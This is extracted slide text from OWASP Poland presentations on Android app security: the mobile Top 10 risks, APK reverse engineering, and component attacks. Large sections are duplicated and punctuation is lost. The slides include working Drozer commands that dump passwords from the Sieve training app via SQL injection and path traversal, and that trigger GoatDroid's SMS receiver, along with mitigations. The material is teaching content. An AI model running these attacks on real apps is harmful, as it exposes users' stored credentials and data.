Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
